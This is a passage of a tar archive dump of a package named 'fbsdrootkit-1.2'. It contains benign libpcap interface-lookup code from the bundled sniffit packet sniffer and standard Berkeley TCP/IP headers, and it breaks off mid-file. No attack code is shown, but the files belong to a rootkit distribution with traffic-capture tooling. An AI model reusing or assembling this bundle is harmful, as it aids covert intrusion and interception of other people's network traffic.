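	ifrp = ibuf;
	ifend = (struct ifreq *)((char *)ibuf + ifc.ifc_len);

	mp = NULL;
	minunit = 0;
	for (; ifrp < ifend; ifrp = ifnext) {
#if BSD - 0 >= 199006
		n = ifrp->ifr_addr.sa_len + sizeof(ifrp->ifr_name);
		if (n < (int)sizeof(*ifrp))
			ifnext = ifrp + 1;
		else
			ifnext = (struct ifreq *)((char *)ifrp + n);
		if (ifrp->ifr_addr.sa_family != AF_INET)
			continue;
#else
		ifnext = ifrp + 1;
#endif
		/*
		 * Need a template to preserve address info that is
		 * used below to locate the next entry.  (Otherwise,
		 * SIOCGIFFLAGS stomps over it because the requests
		 * are returned in a union.)
		 */
		strncpy(ifr.ifr_name, ifrp->ifr_name, sizeof(ifr.ifr_name));
		if (ioctl(fd, SIOCGIFFLAGS, (char *)&ifr) < 0) {
			(void)sprintf(errbuf, "SIOCGIFFLAGS: %s",
			    pcap_strerror(errno));
			(void)close(fd);
			return (NULL);
		}

		/* Must be up and not the loopback */
		if ((ifr.ifr_flags & IFF_UP) == 0 || ISLOOPBACK(&ifr))
			continue;

		/*
		 * Find the unit number in a private, NUL-terminated copy
		 * of the name, so that neither the scan for the first
		 * digit nor atoi() can run past the end of the ifr_name
		 * field when the name has no digit or fills the field.
		 * A name without a digit counts as unit 0.
		 */
		(void)strncpy(name, ifrp->ifr_name, sizeof(name) - 1);
		name[sizeof(name) - 1] = '\0';
		for (cp = name;
		    *cp != '\0' && !isdigit((unsigned char)*cp); ++cp)
			continue;
		n = atoi(cp);

		/*
		 * The first candidate always wins; after that, lower
		 * unit numbers win.  (No fixed upper bound on the unit
		 * number is imposed.)
		 */
		if (mp == NULL || n < minunit) {
			minunit = n;
			mp = ifrp;
		}
	}
	(void)close(fd);
	if (mp == NULL) {
		(void)strcpy(errbuf, "no suitable device found");
		return (NULL);
	}

	(void)strncpy(device, mp->ifr_name, sizeof(device) - 1);
	device[sizeof(device) - 1] = '\0';
	return (device);
}

/*
 * Look up the IPv4 network number and netmask of 'device'.
 *
 * On success returns 0 with *netp set to the interface address masked
 * by *maskp.  If the interface reports a zero mask, the classful mask
 * for the address is used.  On failure returns -1 with a message in
 * errbuf (size not visible here - presumably PCAP_ERRBUF_SIZE; confirm).
 *
 * 'device' is supplied by the caller and may be arbitrarily long: it is
 * truncated to fit ifr_name and always NUL-terminated, and error
 * messages print that bounded copy rather than the caller's string, so
 * an over-long name cannot overrun errbuf.
 */
int
pcap_lookupnet(device, netp, maskp, errbuf)
	register char *device;
	register u_long *netp, *maskp;
	register char *errbuf;
{
	register int fd;
	register struct sockaddr_in *sin;
	struct ifreq ifr;

	fd = socket(AF_INET, SOCK_DGRAM, 0);
	if (fd < 0) {
		(void)sprintf(errbuf, "socket: %s", pcap_strerror(errno));
		return (-1);
	}
	(void)strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name) - 1);
	ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
	if (ioctl(fd, SIOCGIFADDR, (char *)&ifr) < 0) {
		(void)sprintf(errbuf, "SIOCGIFADDR: %s: %s",
		    ifr.ifr_name, pcap_strerror(errno));
		(void)close(fd);
		return (-1);
	}
	sin = (struct sockaddr_in *)&ifr.ifr_addr;
	*netp = sin->sin_addr.s_addr;
	if (ioctl(fd, SIOCGIFNETMASK, (char *)&ifr) < 0) {
		(void)sprintf(errbuf, "SIOCGIFNETMASK: %s: %s",
		    ifr.ifr_name, pcap_strerror(errno));
		(void)close(fd);
		return (-1);
	}
	(void)close(fd);
	*maskp = sin->sin_addr.s_addr;
	if (*maskp == 0) {
		if (IN_CLASSA(*netp))
			*maskp = IN_CLASSA_NET;
		else if (IN_CLASSB(*netp))
			*maskp = IN_CLASSB_NET;
		else if (IN_CLASSC(*netp))
			*maskp = IN_CLASSC_NET;
		else {
			/* *netp is a u_long: print it with %lx, not %x */
			(void)sprintf(errbuf, "inet class for 0x%lx unknown",
			    (unsigned long)*netp);
			return (-1);
		}
	}
	*netp &= *maskp;
	return (0);
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/ 40700 764 764 0 6226213210 17322 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/protocols/ 40700 764 764 0 6226213210 21346 5ustar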
dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/protocols/routed.h100600 764 764 4363 6226213210 23126 0ustar dfdf/* @(#)routed.h 1.9 88/08/19 SMI; from UCB 5.1 6/4/85 */ /* * Copyright (c) 1983 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Routing Information Protocol * * Derived from Xerox NS Routing Information Protocol * by changing 32-bit net numbers to sockaddr's and * padding stuff to 32-bit boundaries. */ #ifndef _protocols_routed_h #define _protocols_routed_h #define RIPVERSION 1 struct netinfo { struct sockaddr rip_dst; /* destination net/host */ int rip_metric; /* cost of route */ }; struct rip { u_char rip_cmd; /* request/response */ u_char rip_vers; /* protocol version # */ u_char rip_res1[2]; /* pad to 32-bit boundary */ union { struct netinfo ru_nets[1]; /* variable length... */ char ru_tracefile[1]; /* ditto ... */ } ripun; #define rip_nets ripun.ru_nets #define rip_tracefile ripun.ru_tracefile }; struct entryinfo { struct sockaddr rtu_dst; struct sockaddr rtu_router; short rtu_flags; short rtu_state; int rtu_timer; int rtu_metric; int int_flags; char int_name[16]; }; /* * Packet types. */ #define RIPCMD_REQUEST 1 /* want info - from suppliers */ #define RIPCMD_RESPONSE 2 /* responding to request */ #define RIPCMD_TRACEON 3 /* turn tracing on */ #define RIPCMD_TRACEOFF 4 /* turn it off */ #define RIPCMD_POLL 5 /* like request, but anyone answers */ #define RIPCMD_POLLENTRY 6 /* like poll, but for entire entry */ #define RIPCMD_MAX 7 #ifdef RIPCMDS char *ripcmds[RIPCMD_MAX] = { "#0", "REQUEST", "RESPONSE", "TRACEON", "TRACEOFF", "POLL", "POLLENTRY" }; #endif #define HOPCNT_INFINITY 16 /* per Xerox NS */ #define MAXPACKETSIZE 512 /* max broadcast size */ /* * Timer values used in managing the routing table. * Every update forces an entry's timer to be reset. 
After * EXPIRE_TIME without updates, the entry is marked invalid, * but held onto until GARBAGE_TIME so that others may * see it "be deleted". */ #define TIMER_RATE 30 /* alarm clocks every 30 seconds */ #define SUPPLY_INTERVAL 30 /* time to supply tables */ #define EXPIRE_TIME 180 /* time to mark entry invalid */ #define GARBAGE_TIME 240 /* time to garbage collect */ #endif /*!_protocols_routed_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/ 40700 764 764 0 6226213210 20770 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/udp_var.h100600 764 764 2015 6226213210 22676 0ustar dfdf/* @(#)udp_var.h 1.8 88/08/19 SMI; from UCB 7.1 6/5/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * UDP kernel structures and variables. */ #ifndef _netinet_udp_var_h #define _netinet_udp_var_h struct udpiphdr { struct ipovly ui_i; /* overlaid ip structure */ struct udphdr ui_u; /* udp header */ }; #define ui_next ui_i.ih_next #define ui_prev ui_i.ih_prev #define ui_x1 ui_i.ih_x1 #define ui_pr ui_i.ih_pr #define ui_len ui_i.ih_len #define ui_src ui_i.ih_src #define ui_dst ui_i.ih_dst #define ui_sport ui_u.uh_sport #define ui_dport ui_u.uh_dport #define ui_ulen ui_u.uh_ulen #define ui_sum ui_u.uh_sum struct udpstat { int udps_hdrops; int udps_badsum; int udps_badlen; int udps_fullsock; }; #define UDP_TTL 30 /* time to live for UDP packets */ #ifdef KERNEL struct inpcb udb; struct udpstat udpstat; #endif #endif /*!_netinet_udp_var_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/tcpip.h100600 764 764 1730 6226213210 22360 0ustar dfdf/* @(#)tcpip.h 1.7 88/08/19 SMI; from UCB 7.1 6/5/85 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. 
*/ /* * Tcp+ip header, after ip options removed. */ #ifndef _netinet_tcpip_h #define _netinet_tcpip_h struct tcpiphdr { struct ipovly ti_i; /* overlaid ip structure */ struct tcphdr ti_t; /* tcp header */ }; #define ti_next ti_i.ih_next #define ti_prev ti_i.ih_prev #define ti_x1 ti_i.ih_x1 #define ti_pr ti_i.ih_pr #define ti_len ti_i.ih_len #define ti_src ti_i.ih_src #define ti_dst ti_i.ih_dst #define ti_sport ti_t.th_sport #define ti_dport ti_t.th_dport #define ti_seq ti_t.th_seq #define ti_ack ti_t.th_ack #define ti_x2 ti_t.th_x2 #define ti_off ti_t.th_off #define ti_flags ti_t.th_flags #define ti_win ti_t.th_win #define ti_sum ti_t.th_sum #define ti_urp ti_t.th_urp #endif /*!_netinet_tcpip_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/in_systm.h100600 764 764 1130 6226213210 23100 0ustar dfdf/* @(#)in_systm.h 1.8 88/08/19 SMI; from UCB 7.1 6/5/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Miscellaneous internetwork * definitions for kernel. */ #ifndef _netinet_in_systm_h #define _netinet_in_systm_h typedef u_short n_short; /* short as received from the net */ typedef u_long n_long; /* long as received from the net */ typedef u_long n_time; /* ms since 00:00 GMT, byte rev */ #endif /*!_netinet_in_systm_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/if_ether.h100600 764 764 3465 6226213210 23035 0ustar dfdf/* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and that due credit is given * to the University of California at Berkeley. The name of the University * may not be used to endorse or promote products derived from this * software without specific prior written permission. 
This software * is provided ``as is'' without express or implied warranty. * * @(#)if_ether.h 1.28 89/08/04 SMI; from UCB 7.2 12/7/87 */ #ifndef _netinet_if_ether_h #define _netinet_if_ether_h #include /* * Ethernet address - 6 octets */ struct ether_addr { u_char ether_addr_octet[6]; }; /* * Structure of a 10Mb/s Ethernet header. */ struct ether_header { struct ether_addr ether_dhost; struct ether_addr ether_shost; u_short ether_type; }; #define ETHERTYPE_PUP 0x0200 /* PUP protocol */ #define ETHERTYPE_IP 0x0800 /* IP protocol */ #define ETHERTYPE_ARP 0x0806 /* Addr. resolution protocol */ #define ETHERTYPE_REVARP 0x8035 /* Reverse ARP */ #define ETHERTYPE_TRAIL 0x1000 /* * Ethernet Address Resolution Protocol. * * See RFC 826 for protocol description. Structure below is adapted * to resolving internet addresses. Field names used correspond to * RFC 826. */ struct ether_arp { struct arphdr ea_hdr; /* fixed-size header */ struct ether_addr arp_sha; /* sender hardware address */ u_char arp_spa[4]; /* sender protocol address */ struct ether_addr arp_tha; /* target hardware address */ u_char arp_tpa[4]; /* target protocol address */ }; #define arp_hrd ea_hdr.ar_hrd #define arp_pro ea_hdr.ar_pro #define arp_hln ea_hdr.ar_hln #define arp_pln ea_hdr.ar_pln #define arp_op ea_hdr.ar_op #define ETHERMTU 1500 #endif /*!_netinet_if_ether_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/ip.h100600 764 764 7555 6226213210 21664 0ustar dfdf/* @(#)ip.h 1.13 88/08/19 SMI; from UCB 7.6.1.1 3/15/88 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and that due credit is given * to the University of California at Berkeley. The name of the University * may not be used to endorse or promote products derived from this * software without specific prior written permission. 
This software * is provided ``as is'' without express or implied warranty. */ /* * Definitions for internet protocol version 4. * Per RFC 791, September 1981. */ #ifndef _netinet_ip_h #define _netinet_ip_h #define IPVERSION 4 /* * Structure of an internet header, naked of options. * * We declare ip_len and ip_off to be short, rather than u_short * pragmatically since otherwise unsigned comparisons can result * against negative integers quite easily, and fail in subtle ways. */ struct ip { #if defined(vax) || defined(i386) u_char ip_hl:4, /* header length */ ip_v:4; /* version */ #endif #if defined(mc68000) || defined(sparc) u_char ip_v:4, /* version */ ip_hl:4; /* header length */ #endif u_char ip_tos; /* type of service */ short ip_len; /* total length */ u_short ip_id; /* identification */ short ip_off; /* fragment offset field */ #define IP_DF 0x4000 /* dont fragment flag */ #define IP_MF 0x2000 /* more fragments flag */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* checksum */ struct in_addr ip_src,ip_dst; /* source and dest address */ }; #define IP_MAXPACKET 65535 /* maximum packet size */ /* * Definitions for options. */ #define IPOPT_COPIED(o) ((o)&0x80) #define IPOPT_CLASS(o) ((o)&0x60) #define IPOPT_NUMBER(o) ((o)&0x1f) #define IPOPT_CONTROL 0x00 #define IPOPT_RESERVED1 0x20 #define IPOPT_DEBMEAS 0x40 #define IPOPT_RESERVED2 0x60 #define IPOPT_EOL 0 /* end of option list */ #define IPOPT_NOP 1 /* no operation */ #define IPOPT_RR 7 /* record packet route */ #define IPOPT_TS 68 /* timestamp */ #define IPOPT_SECURITY 130 /* provide s,c,h,tcc */ #define IPOPT_LSRR 131 /* loose source route */ #define IPOPT_SATID 136 /* satnet id */ #define IPOPT_SSRR 137 /* strict source route */ /* * Offsets to fields in options other than EOL and NOP. 
*/ #define IPOPT_OPTVAL 0 /* option ID */ #define IPOPT_OLEN 1 /* option length */ #define IPOPT_OFFSET 2 /* offset within option */ #define IPOPT_MINOFF 4 /* min value of above */ /* * Time stamp option structure. */ struct ip_timestamp { u_char ipt_code; /* IPOPT_TS */ u_char ipt_len; /* size of structure (variable) */ u_char ipt_ptr; /* index of current entry */ #if defined(vax) || defined(i386) u_char ipt_flg:4, /* flags, see below */ ipt_oflw:4; /* overflow counter */ #endif #if defined(mc68000) || defined(sparc) u_char ipt_oflw:4, /* overflow counter */ ipt_flg:4; /* flags, see below */ #endif union ipt_timestamp { n_long ipt_time[1]; struct ipt_ta { struct in_addr ipt_addr; n_long ipt_time; } ipt_ta[1]; } ipt_timestamp; }; /* flag bits for ipt_flg */ #define IPOPT_TS_TSONLY 0 /* timestamps only */ #define IPOPT_TS_TSANDADDR 1 /* timestamps and addresses */ #define IPOPT_TS_PRESPEC 2 /* specified modules only */ /* bits for security (not byte swapped) */ #define IPOPT_SECUR_UNCLASS 0x0000 #define IPOPT_SECUR_CONFID 0xf135 #define IPOPT_SECUR_EFTO 0x789a #define IPOPT_SECUR_MMMM 0xbc4d #define IPOPT_SECUR_RESTR 0xaf13 #define IPOPT_SECUR_SECRET 0xd788 #define IPOPT_SECUR_TOPSECRET 0x6bc5 /* * Internet implementation parameters. */ #define MAXTTL 255 /* maximum time to live (seconds) */ #define IPFRAGTTL 60 /* time to live for frags, slowhz */ #define IPTTLDEC 1 /* subtracted when forwarding */ #define IP_MSS 576 /* default maximum segment size */ #endif /*!_netinet_ip_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/ip_icmp.h100600 764 764 10003 6226213210 22672 0ustar dfdf/* @(#)ip_icmp.h 1.9 88/08/19 SMI; from UCB 7.3 12/7/87 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and that due credit is given * to the University of California at Berkeley. 
The name of the University * may not be used to endorse or promote products derived from this * software without specific prior written permission. This software * is provided ``as is'' without express or implied warranty. */ /* * Interface Control Message Protocol Definitions. * Per RFC 792, September 1981. */ #ifndef _netinet_ip_icmp_h #define _netinet_ip_icmp_h /* * Structure of an icmp header. */ struct icmp { u_char icmp_type; /* type of message, see below */ u_char icmp_code; /* type sub code */ u_short icmp_cksum; /* ones complement cksum of struct */ union { u_char ih_pptr; /* ICMP_PARAMPROB */ struct in_addr ih_gwaddr; /* ICMP_REDIRECT */ struct ih_idseq { n_short icd_id; n_short icd_seq; } ih_idseq; int ih_void; } icmp_hun; #define icmp_pptr icmp_hun.ih_pptr #define icmp_gwaddr icmp_hun.ih_gwaddr #define icmp_id icmp_hun.ih_idseq.icd_id #define icmp_seq icmp_hun.ih_idseq.icd_seq #define icmp_void icmp_hun.ih_void union { struct id_ts { n_time its_otime; n_time its_rtime; n_time its_ttime; } id_ts; struct id_ip { struct ip idi_ip; /* options and then 64 bits of data */ } id_ip; u_long id_mask; char id_data[1]; } icmp_dun; #define icmp_otime icmp_dun.id_ts.its_otime #define icmp_rtime icmp_dun.id_ts.its_rtime #define icmp_ttime icmp_dun.id_ts.its_ttime #define icmp_ip icmp_dun.id_ip.idi_ip #define icmp_mask icmp_dun.id_mask #define icmp_data icmp_dun.id_data }; /* * Lower bounds on packet lengths for various types. * For the error advice packets must first insure that the * packet is large enought to contain the returned ip header. * Only then can we do the check to see if 64 bits of packet * data have been returned, since we need to check the returned * ip header length. 
*/ #define ICMP_MINLEN 8 /* abs minimum */ #define ICMP_TSLEN (8 + 3 * sizeof (n_time)) /* timestamp */ #define ICMP_MASKLEN 12 /* address mask */ #define ICMP_ADVLENMIN (8 + sizeof (struct ip) + 8) /* min */ #define ICMP_ADVLEN(p) (8 + ((p)->icmp_ip.ip_hl << 2) + 8) /* N.B.: must separately check that ip_hl >= 5 */ /* * Definition of type and code field values. */ #define ICMP_ECHOREPLY 0 /* echo reply */ #define ICMP_UNREACH 3 /* dest unreachable, codes: */ #define ICMP_UNREACH_NET 0 /* bad net */ #define ICMP_UNREACH_HOST 1 /* bad host */ #define ICMP_UNREACH_PROTOCOL 2 /* bad protocol */ #define ICMP_UNREACH_PORT 3 /* bad port */ #define ICMP_UNREACH_NEEDFRAG 4 /* IP_DF caused drop */ #define ICMP_UNREACH_SRCFAIL 5 /* src route failed */ #define ICMP_SOURCEQUENCH 4 /* packet lost, slow down */ #define ICMP_REDIRECT 5 /* shorter route, codes: */ #define ICMP_REDIRECT_NET 0 /* for network */ #define ICMP_REDIRECT_HOST 1 /* for host */ #define ICMP_REDIRECT_TOSNET 2 /* for tos and net */ #define ICMP_REDIRECT_TOSHOST 3 /* for tos and host */ #define ICMP_ECHO 8 /* echo service */ #define ICMP_TIMXCEED 11 /* time exceeded, code: */ #define ICMP_TIMXCEED_INTRANS 0 /* ttl==0 in transit */ #define ICMP_TIMXCEED_REASS 1 /* ttl==0 in reass */ #define ICMP_PARAMPROB 12 /* ip header bad */ #define ICMP_TSTAMP 13 /* timestamp request */ #define ICMP_TSTAMPREPLY 14 /* timestamp reply */ #define ICMP_IREQ 15 /* information request */ #define ICMP_IREQREPLY 16 /* information reply */ #define ICMP_MASKREQ 17 /* address mask request */ #define ICMP_MASKREPLY 18 /* address mask reply */ #define ICMP_MAXTYPE 18 #define ICMP_INFOTYPE(type) \ ((type) == ICMP_ECHOREPLY || (type) == ICMP_ECHO || \ (type) == ICMP_TSTAMP || (type) == ICMP_TSTAMPREPLY || \ (type) == ICMP_IREQ || (type) == ICMP_IREQREPLY || \ (type) == ICMP_MASKREQ || (type) == ICMP_MASKREPLY) #endif /*!_netinet_ip_icmp_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/ip_var.h100600 764 764 6121 6226213210 
22520 0ustar dfdf/* @(#)ip_var.h 1.11 88/08/19 SMI; from UCB 7.1 6/5/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Overlay for ip header used by other protocols (tcp, udp). */ #ifndef _netinet_ip_var_h #define _netinet_ip_var_h struct ipovly { caddr_t ih_next, ih_prev; /* for protocol sequence q's */ u_char ih_x1; /* (unused) */ u_char ih_pr; /* protocol */ short ih_len; /* protocol length */ struct in_addr ih_src; /* source internet address */ struct in_addr ih_dst; /* destination internet address */ }; /* * Ip reassembly queue structure. Each fragment * being reassembled is attached to one of these structures. * They are timed out after ipq_ttl drops to 0, and may also * be reclaimed if memory becomes tight. */ struct ipq { struct ipq *next,*prev; /* to other reass headers */ u_char ipq_ttl; /* time for reass q to live */ u_char ipq_p; /* protocol of this fragment */ u_short ipq_id; /* sequence id for reassembly */ struct ipasfrag *ipq_next,*ipq_prev; /* to ip headers of fragments */ struct in_addr ipq_src,ipq_dst; }; /* * Ip header, when holding a fragment. * * Note: ipf_next must be at same offset as ipq_next above */ struct ipasfrag { #if defined(vax) || defined(i386) u_char ip_hl:4, ip_v:4; #endif #if defined(mc68000) || defined(sparc) u_char ip_v:4, ip_hl:4; #endif u_char ipf_mff; /* copied from (ip_off&IP_MF) */ short ip_len; u_short ip_id; short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; struct ipasfrag *ipf_next; /* next fragment */ struct ipasfrag *ipf_prev; /* previous fragment */ }; /* * Structure stored in mbuf in inpcb.ip_options * and passed to ip_output when ip options are in use. * The actual length of the options (including ipopt_dst) * is in m_len. 
*/ #define MAX_IPOPTLEN 40 struct ipoption { struct in_addr ipopt_dst; /* first-hop dst if source routed */ char ipopt_list[MAX_IPOPTLEN]; /* options proper */ }; struct ipstat { long ips_total; /* total packets received */ long ips_badsum; /* checksum bad */ long ips_tooshort; /* packet too short */ long ips_toosmall; /* not enough data */ long ips_badhlen; /* ip header length < data size */ long ips_badlen; /* ip length < ip header length */ long ips_fragments; /* fragments received */ long ips_fragdropped; /* frags dropped (dups, out of space) */ long ips_fragtimeout; /* fragments timed out */ long ips_forward; /* packets forwarded */ long ips_cantforward; /* packets rcvd for unreachable dest */ long ips_redirectsent; /* packets forwarded on same net */ }; #ifdef KERNEL /* flags passed to ip_output as last parameter */ #define IP_FORWARDING 0x1 /* most of ip header exists */ #define IP_ROUTETOIF SO_DONTROUTE /* bypass routing tables */ #define IP_ALLOWBROADCAST SO_BROADCAST /* can send broadcast packets */ struct ipstat ipstat; struct ipq ipq; /* ip reass. queue */ u_short ip_id; /* ip packet ctr, for ids */ struct mbuf *ip_srcroute(); #endif #endif /*!_netinet_ip_var_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/tcp.h100600 764 764 2520 6226213210 22025 0ustar dfdf/* @(#)tcp.h 1.11 88/08/19 SMI; from UCB 7.2 10/28/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ #ifndef _netinet_tcp_h #define _netinet_tcp_h typedef u_long tcp_seq; /* * TCP header. * Per RFC 793, September, 1981. 
*/ struct tcphdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ tcp_seq th_seq; /* sequence number */ tcp_seq th_ack; /* acknowledgement number */ #if defined(vax) || defined(i386) u_char th_x2:4, /* (unused) */ th_off:4; /* data offset */ #endif #if defined(mc68000) || defined(sparc) u_char th_off:4, /* data offset */ th_x2:4; /* (unused) */ #endif u_char th_flags; #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PUSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 u_short th_win; /* window */ u_short th_sum; /* checksum */ u_short th_urp; /* urgent pointer */ }; #define TCPOPT_EOL 0 #define TCPOPT_NOP 1 #define TCPOPT_MAXSEG 2 /* * Default maximum segment size for TCP. * With an IP MSS of 576, this is 536, * but 512 is probably more convenient. */ #ifdef lint #define TCP_MSS 536 #else #define TCP_MSS MIN(512, IP_MSS - sizeof (struct tcpiphdr)) #endif #endif /*!_netinet_tcp_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/tcp_var.h100600 764 764 14273 6226213210 22725 0ustar dfdf/* @(#)tcp_var.h 1.11 88/08/19 SMI; from UCB 7.3 6/30/87 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Kernel variables for tcp. */ #ifndef _netinet_tcp_var_h #define _netinet_tcp_var_h /* * Tcp control block, one per tcp; fields: */ struct tcpcb { struct tcpiphdr *seg_next; /* sequencing queue */ struct tcpiphdr *seg_prev; short t_state; /* state of this connection */ short t_timer[TCPT_NTIMERS]; /* tcp timers */ short t_rxtshift; /* log(2) of rexmt exp. 
backoff */ short t_rxtcur; /* current retransmit value */ short t_dupacks; /* consecutive dup acks recd */ u_short t_maxseg; /* maximum segment size */ char t_force; /* 1 if forcing out a byte */ u_char t_flags; #define TF_ACKNOW 0x01 /* ack peer immediately */ #define TF_DELACK 0x02 /* ack, but try to delay it */ #define TF_NODELAY 0x04 /* don't delay packets to coalesce */ #define TF_NOOPT 0x08 /* don't use tcp options */ #define TF_SENTFIN 0x10 /* have sent FIN */ struct tcpiphdr *t_template; /* skeletal packet for transmit */ struct inpcb *t_inpcb; /* back pointer to internet pcb */ /* * The following fields are used as in the protocol specification. * See RFC783, Dec. 1981, page 21. */ /* send sequence variables */ tcp_seq snd_una; /* send unacknowledged */ tcp_seq snd_nxt; /* send next */ tcp_seq snd_up; /* send urgent pointer */ tcp_seq snd_wl1; /* window update seg seq number */ tcp_seq snd_wl2; /* window update seg ack number */ tcp_seq iss; /* initial send sequence number */ u_short snd_wnd; /* send window */ /* receive sequence variables */ u_short rcv_wnd; /* receive window */ tcp_seq rcv_nxt; /* receive next */ tcp_seq rcv_up; /* receive urgent pointer */ tcp_seq irs; /* initial receive sequence number */ /* * Additional variables for this implementation. */ /* receive variables */ tcp_seq rcv_adv; /* advertised window */ /* retransmit variables */ tcp_seq snd_max; /* highest sequence number sent * used to recognize retransmits */ /* congestion control (for slow start, source quench, retransmit after loss) */ u_short snd_cwnd; /* congestion-controlled window */ u_short snd_ssthresh; /* snd_cwnd size threshhold for * for slow start exponential to * linear switch */ /* * transmit timing stuff. * srtt and rttvar are stored as fixed point; for convenience in smoothing, * srtt has 3 bits to the right of the binary point, rttvar has 2. * "Variance" is actually smoothed difference. 
*/ short t_idle; /* inactivity time */ short t_rtt; /* round trip time */ tcp_seq t_rtseq; /* sequence number being timed */ short t_srtt; /* smoothed round-trip time */ short t_rttvar; /* variance in round-trip time */ u_short max_rcvd; /* most peer has sent into window */ u_short max_sndwnd; /* largest window peer has offered */ /* out-of-band data */ char t_oobflags; /* have some */ char t_iobc; /* input character */ #define TCPOOB_HAVEDATA 0x01 #define TCPOOB_HADDATA 0x02 }; #define intotcpcb(ip) ((struct tcpcb *)(ip)->inp_ppcb) #define sototcpcb(so) (intotcpcb(sotoinpcb(so))) /* * TCP statistics. * Many of these should be kept per connection, * but that's inconvenient at the moment. */ struct tcpstat { u_long tcps_connattempt; /* connections initiated */ u_long tcps_accepts; /* connections accepted */ u_long tcps_connects; /* connections established */ u_long tcps_drops; /* connections dropped */ u_long tcps_conndrops; /* embryonic connections dropped */ u_long tcps_closed; /* conn. closed (includes drops) */ u_long tcps_segstimed; /* segs where we tried to get rtt */ u_long tcps_rttupdated; /* times we succeeded */ u_long tcps_delack; /* delayed acks sent */ u_long tcps_timeoutdrop; /* conn. 
dropped in rxmt timeout */ u_long tcps_rexmttimeo; /* retransmit timeouts */ u_long tcps_persisttimeo; /* persist timeouts */ u_long tcps_keeptimeo; /* keepalive timeouts */ u_long tcps_keepprobe; /* keepalive probes sent */ u_long tcps_keepdrops; /* connections dropped in keepalive */ u_long tcps_sndtotal; /* total packets sent */ u_long tcps_sndpack; /* data packets sent */ u_long tcps_sndbyte; /* data bytes sent */ u_long tcps_sndrexmitpack; /* data packets retransmitted */ u_long tcps_sndrexmitbyte; /* data bytes retransmitted */ u_long tcps_sndacks; /* ack-only packets sent */ u_long tcps_sndprobe; /* window probes sent */ u_long tcps_sndurg; /* packets sent with URG only */ u_long tcps_sndwinup; /* window update-only packets sent */ u_long tcps_sndctrl; /* control (SYN|FIN|RST) packets sent */ u_long tcps_rcvtotal; /* total packets received */ u_long tcps_rcvpack; /* packets received in sequence */ u_long tcps_rcvbyte; /* bytes received in sequence */ u_long tcps_rcvbadsum; /* packets received with ccksum errs */ u_long tcps_rcvbadoff; /* packets received with bad offset */ u_long tcps_rcvshort; /* packets received too short */ u_long tcps_rcvduppack; /* duplicate-only packets received */ u_long tcps_rcvdupbyte; /* duplicate-only bytes received */ u_long tcps_rcvpartduppack; /* packets with some duplicate data */ u_long tcps_rcvpartdupbyte; /* dup. bytes in part-dup. 
packets */ u_long tcps_rcvoopack; /* out-of-order packets received */ u_long tcps_rcvoobyte; /* out-of-order bytes received */ u_long tcps_rcvpackafterwin; /* packets with data after window */ u_long tcps_rcvbyteafterwin; /* bytes rcvd after window */ u_long tcps_rcvafterclose; /* packets rcvd after "close" */ u_long tcps_rcvwinprobe; /* rcvd window probe packets */ u_long tcps_rcvdupack; /* rcvd duplicate acks */ u_long tcps_rcvacktoomuch; /* rcvd acks for unsent data */ u_long tcps_rcvackpack; /* rcvd ack packets */ u_long tcps_rcvackbyte; /* bytes acked by rcvd acks */ u_long tcps_rcvwinupd; /* rcvd window update packets */ }; #ifdef KERNEL struct inpcb tcb; /* head of queue of active tcpcb's */ struct tcpstat tcpstat; /* tcp statistics */ struct tcpiphdr *tcp_template(); struct tcpcb *tcp_close(), *tcp_drop(); struct tcpcb *tcp_timers(), *tcp_disconnect(), *tcp_usrclosed(); #endif #ifdef sun #define TCP_COMPAT_42 #endif #endif /*!_netinet_tcp_var_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/udp.h100600 764 764 1067 6226213210 22034 0ustar dfdf/* @(#)udp.h 1.7 88/08/19 SMI; from UCB 7.1 6/5/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Udp protocol header. * Per RFC 768, September, 1981. 
